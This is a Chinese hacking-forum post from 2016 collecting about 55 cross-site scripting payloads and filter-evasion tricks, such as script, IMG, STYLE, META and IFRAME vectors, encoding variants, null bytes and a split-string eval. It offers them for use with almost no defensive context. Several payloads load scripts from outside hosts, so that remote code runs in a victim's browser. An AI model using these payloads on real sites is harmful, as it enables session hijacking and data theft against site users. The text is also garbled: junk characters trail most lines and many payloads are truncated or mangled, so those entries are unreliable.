找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2468|回复: 0
打印 上一主题 下一主题

XSS攻击汇总

[复制链接]
跳转到指定楼层
楼主
发表于 2016-4-28 10:06:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
(1)普通的XSS JavaScript注入
( `, w" J; m+ Q# ~& V
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
6 R5 N, `# `) w
(99)另类弹框
, T: J  Y( M; e; v/ z- S
<q/oncut=alert()>1+ P: a9 K- k$ x" t
<s/onclick=alert()>b
  o4 ~# k8 O" Y' v% P/ C <XSS=" onclick="alert(1)//">clickme</SSX=">
& m, J, P  S- o7 F& b, G <zzz onclick=alert`1`>clickme</zzz> ' g1 Z$ k' ?7 K& c
<a onclick=alert`1`>clickme</a>
/ @( E+ \: R  @$ Z<a=">clickme</a=">
4 z/ Q9 V4 c0 j+ V/ k* y  ]9 A- `<a=">clickme</a>% _) z+ B: m) H5 K. f' \7 r
<z=">clickme</z=">
9 t" }, D1 ?2 t( e7 K: `5 S<z onclick=alert`1`>clickme</z>
0 @3 t/ O' N/ T4 e: F6 k+ }7 b
' |# p9 W( o9 E5 O! H: L(2)IMG标签XSS使用JavaScript命令
2 G6 Z& a2 L3 E) h% Q+ |
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
7 A$ `- ^0 P: v+ v

$ V( W( p: p- k  p1 w  P; k' Q# G/ Z
(3)IMG标签无分号无引号, r4 _! O  E, b
<IMG SRC=javascript:alert(‘XSS’)>* ]: F( V  Z% x% i; H

6 h* @% M  y+ x# H& @" h$ B9 a
(4)IMG标签大小写不敏感' C/ J! n& I( ]$ Y7 u: w4 H
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
  F3 u4 E+ [3 h, A; u6 x: H
( E7 U' R! U5 y4 [5 b6 c! L9 U7 J
(5)HTML编码(必须有分号)5 }% o; }+ t5 ~  E: ^8 |" K& }
<IMG SRC=javascript:alert(“XSS”)>
' I4 E- T- T" j( v

' Z/ R7 ]4 x8 A5 y
(6)修正缺陷IMG标签
7 D: O  i1 g( Y# @+ t. c/ T
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>! h4 k4 M; J$ [) [5 ]  |! j

3 I2 w  x! V* D) S% Z8 T& S
(7)formCharCode标签(计算器)
5 U" s  c! R6 b1 Z
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>/ f% {$ W1 `( A: d& ~) L
* }5 P' V1 }) S
(8)UTF-8的Unicode编码(计算器)4 D8 h0 ?2 p& Y3 Z" W. X; Q
<IMG SRC=jav..省略..S')>2 P' S% u1 h" v+ g( {

* v5 [( R: l. K' B& ~8 T1 f! k7 z6 Z4 Q
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
3 Z- s7 d) O' K- B2 T) O7 k( ]. b
<IMG SRC=jav..省略..S')># |0 u, I. o0 C% e

2 M# Z. e$ H: ]! h! c( N5 L
(10)十六进制编码也是没有分号(计算器)6 |- i  Y& g, |# K& [+ k
<IMG SRC=\'#\'" /span>
0 q) S6 V/ U# l8 J5 a: L3 c/ k( o- Y  c5 {  u! u
(11)嵌入式标签,将Javascript分开
; a+ r5 V# {. \3 b0 u<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
/ H: y& _( x) K# y3 h6 h
  r9 r2 Y/ q3 G% `9 E- C7 r/ P" m(12)嵌入式编码标签,将Javascript分开
! }/ Z5 b9 m$ l* z9 l! t' h+ b; \<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
, Y0 E2 x3 t  c& u+ `3 z4 y- s
(13)嵌入式换行符
3 C7 R+ w$ Q5 @8 b8 s" W9 l<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
+ W4 q- L3 V4 `6 g  j8 X3 P) A5 K$ G
(14)嵌入式回车' V2 L* H" t# M; o' r5 B
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>5 g' e0 l8 M9 i5 {  |

) x7 h8 T0 ~; D0 j& a(15)嵌入式多行注入JavaScript,这是XSS极端的例子
( ]' ]4 v1 h: d; v9 Z; g<IMG SRC=\'#\'" /span>* a1 ?* P- j( w  b
* N0 B9 f! b  c. X
(16)解决限制字符(要求同页面): |, V% v5 v3 _7 T, O- [2 H; n( V( f" s
<script>z=’document.’</script>
# U" E: l1 O* h% ]<script>z=z+’write(“‘</script>
( x) Y7 e# n+ |3 m& B<script>z=z+’<script’</script>
9 T& j0 a0 a# R/ x# @0 @+ d<script>z=z+’ src=ht’</script>
. E6 [3 A7 v' A( t<script>z=z+’tp://ww’</script>
/ _" f" ]+ C" L& X9 ]3 A<script>z=z+’w.shell’</script>/ R' }% J9 _) f5 t" `
<script>z=z+’.net/1.’</script>/ v4 v0 ~/ F3 s  n
<script>z=z+’js></sc’</script>
( J' ?6 ~- z, }<script>z=z+’ript>”)’</script>. E9 E4 S/ X/ X0 Y: z4 f
<script>eval_r(z)</script>
$ k7 e% C; N: @- }  f9 h6 x: _+ ]0 I2 F* O$ Z
(17)空字符
, ?3 |- H" @9 X, ?1 m& N: B. Mperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
& x5 }& x: w  V; v- N& Z, m
7 F2 h# f4 ~5 _' x(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用. b& c" `9 ]5 O1 c
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
+ f6 s% ^" O6 P% c' i4 t% K$ |! P5 c% c, t4 c
(19)Spaces和meta前的IMG标签
7 Z/ j( o: f8 W; `6 e3 B<IMG SRC=\'#\'"   javascript:alert(‘XSS’);”>
1 R9 a- t2 R4 v) Z% E
6 G. c% O4 y& O8 R; X" z(20)Non-alpha-non-digit XSS4 Q8 A7 T6 Y. \  E) U) z/ F9 G
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>" F8 O  q% I2 l% G( v

6 i, y) E, c( r7 _# _) R8 \(21)Non-alpha-non-digit XSS to 28 M' d( a1 _8 ]: \3 L9 `5 S
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
8 n7 p$ I- S' }5 B- h8 [4 U; B( ~
$ ]7 ~3 z9 k+ n( E+ M! W(22)Non-alpha-non-digit XSS to 3
- n* S) Q2 w$ \0 q' O4 A1 U) ~5 V<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>0 o: `" E! z, g& e: s* N1 ^
" |- A* s2 p3 J, C1 j9 V* Y
(23)双开括号- Y/ H+ M- l* N9 d0 t
<<SCRIPT>alert(“XSS”);//<</SCRIPT>( I/ `1 O; v, S& G# |: W% J- W
* |* f5 `1 G/ f  t; h0 z
(24)无结束脚本标记(仅火狐等浏览器)$ G* q; o7 t6 k' l
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
, j) O; z9 Z; `9 I6 i4 _+ t2 s" U
" D6 H. h8 s0 u( i3 Q(25)无结束脚本标记2& R: ]9 j' b+ u3 z8 l5 h' o
<SCRIPT SRC=//3w.org/XSS/xss.js>0 z* N9 ]& A  M* ^) d; ]

" {0 V3 M2 d( ~, Q4 w6 Z7 q1 s(26)半开的HTML/JavaScript XSS) o- ~) A( m6 y' i  I* q) }
<IMG SRC=\'#\'" /span>
+ K, g- ?0 U  C3 n  D; ]/ |! q
* ?2 t4 M4 g5 G. @4 K# U% @(27)双开角括号
$ m; l% A- p% ~& F' I<iframe src=http://3w.org/XSS.html <. b2 y" X+ E+ S. e# k
: ~' x& U. Y  g, G
(28)无单引号 双引号 分号
4 y9 f% L; D, q5 p; ]. @+ b+ N<SCRIPT>a=/XSS/! z! r- [1 T, d, b& `
alert(a.source)</SCRIPT># }+ [: \6 L. q# `* @  k

* W6 }" J$ y1 j1 y4 W(29)换码过滤的JavaScript
- O5 x$ T4 Z, _+ I. ~4 g3 s\”;alert(‘XSS’);//, a' c, e/ h3 d3 n& r$ K

6 v$ [$ K% x# d: A% A(30)结束Title标签0 b1 U0 o, J  c, A. L# E
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>' ^1 `+ H& r3 e

+ `0 O; L6 z2 s(31)Input Image
9 Y7 k5 W* ~7 O% J8 g/ V<INPUT SRC=\'#\'" /span>1 i4 |9 a% X' A) `7 Q& Z" K
" a' a+ ^1 `$ `& @! o  E3 a/ {
(32)BODY Image
7 D* u. N% |$ g. _1 d; o$ o1 A<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
8 P! l& r# b" A' C8 _7 h5 w; X) n6 ~1 g
(33)BODY标签
3 H$ R; K  [/ X$ C4 X9 j<BODY(‘XSS’)>; V% H, T0 _3 H* E
. m( N* P+ Z5 }* B: l. R
(34)IMG Dynsrc% L5 t4 Z! `+ c. f3 O; R* q6 t
<IMG DYNSRC=\'#\'" /span>5 s+ H% X* f7 ^0 j8 U" {5 |
- t0 N0 r- W5 z) w( M4 \8 s
(35)IMG Lowsrc% a! u. D  v* _5 E. q8 }  |
<IMG LOWSRC=\'#\'" /span>
+ k6 h% o2 Q$ l' e3 W, l3 w4 `  V# Q+ l3 a0 W4 c8 ^
(36)BGSOUND6 x% P* B9 Q% J# `1 J4 f
<BGSOUND SRC=\'#\'" /span>0 d; i. {3 V# `9 U
# q. \/ f9 ?/ O8 S# s
(37)STYLE sheet1 G# n6 s+ N4 x
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>& m* l  k4 g+ F
8 x' A) J' v% W  h$ O1 H
(38)远程样式表: ~5 ~* O. ]# v# N% b; f9 O0 F; h( X7 E
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>8 f2 Y9 M( L% l) S- I' d

& H2 u5 |- u4 Y1 {! E+ h# F(39)List-style-image(列表式)! k" A6 k# N$ ~- k" ~
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
/ W& k( Q7 ?" A/ b( F# U9 [) m8 Z, W1 B% y) Q5 F- f) X
(40)IMG VBscript
# x& `+ [% a$ v8 s( T) ^! j<IMG SRC=\'#\'" /STYLE><UL><LI>XSS" u  K% P. \/ _; ^) Z1 x
4 p- o& C) b) i! _' m2 g9 m1 ^
(41)META链接url8 L* x% ~# A6 q! `& n
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>) x  r: E' C6 f- j
8 W  o" m" L4 y, {2 w" |2 j
(42)Iframe
9 }8 b" N$ A1 J7 m1 N<IFRAME SRC=\'#\'" /IFRAME>. C" ^, d* R! S" [5 J6 X4 Z2 w8 N
6 R; l$ W: z7 @; c! Q
(43)Frame
' h( D& Q* n2 ]: I! ^<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
0 T% |3 J  j6 h5 r
: }/ w# q, I$ ~5 ?(44)Table
+ |1 h% g. r! G/ r! t# T$ R<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>$ V# U  r  X- f- O7 ]

# f: ^$ d% u+ _! ]3 i$ @(45)TD
6 c; j" \$ n1 r8 [, A<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>. ]2 N2 J( v9 N; L( c6 H

! k3 A4 u* E3 P: u(46)DIV background-image
6 r( ^, O' K" @# u) |" i! q7 x6 H<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
; U. k, W$ f) M
; j4 E. B5 r" `1 B: q4 q& e8 [2 F(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)2 C9 t" }2 k# \3 ~' @
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>) A: L% ]+ V' B
3 J. l- y  [8 |' \8 b) R( G2 H
(48)DIV expression
7 H' P/ x! S7 C; M! d6 Q0 M<DIV STYLE=”width: expression_r(alert(‘XSS’));”>+ b' d" C3 ~- k, h
1 S. ~- y( _& j$ X7 K
(49)STYLE属性分拆表达, F/ g' G/ g* j; S3 x* d/ ~2 n; c
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>' E# A$ |, f1 L) o. k" b
$ ^. x9 l/ {' @8 E# m. P* x! @
(50)匿名STYLE(组成:开角号和一个字母开头)1 Z# \) [& y; t! b
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>) a# o8 m5 ~& \* J

" ?( @( b1 `: {3 N! L* E(51)STYLE background-image) ^2 J5 W+ o5 r2 W
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>% X$ s! I( u9 _. _  t/ h! u0 ^1 `. H
& N( V5 F' K6 n
(52)IMG STYLE方式7 @0 I0 I* G) R6 T3 [
exppression(alert(“XSS”))’>2 D! X9 X( m5 r2 c( B  `" R0 G

$ P! d. j1 s2 F) F: [2 t, K* P(53)STYLE background
& M+ L! P3 l1 r* Q<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
) W3 k3 ?2 y% z$ C8 q
' H3 z1 ]1 x0 W$ W(54)BASE4 Q, ], [/ f+ k* Z/ R
<BASE HREF=”javascript:alert(‘XSS’);//”>
6 f1 h, Y8 j( E, |" P3 E
/ T) e: V, T3 l8 u# z# Z9 }(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
% |0 B* I2 a: B) D9 i<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>

' m& I5 i, d5 x) t: P
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表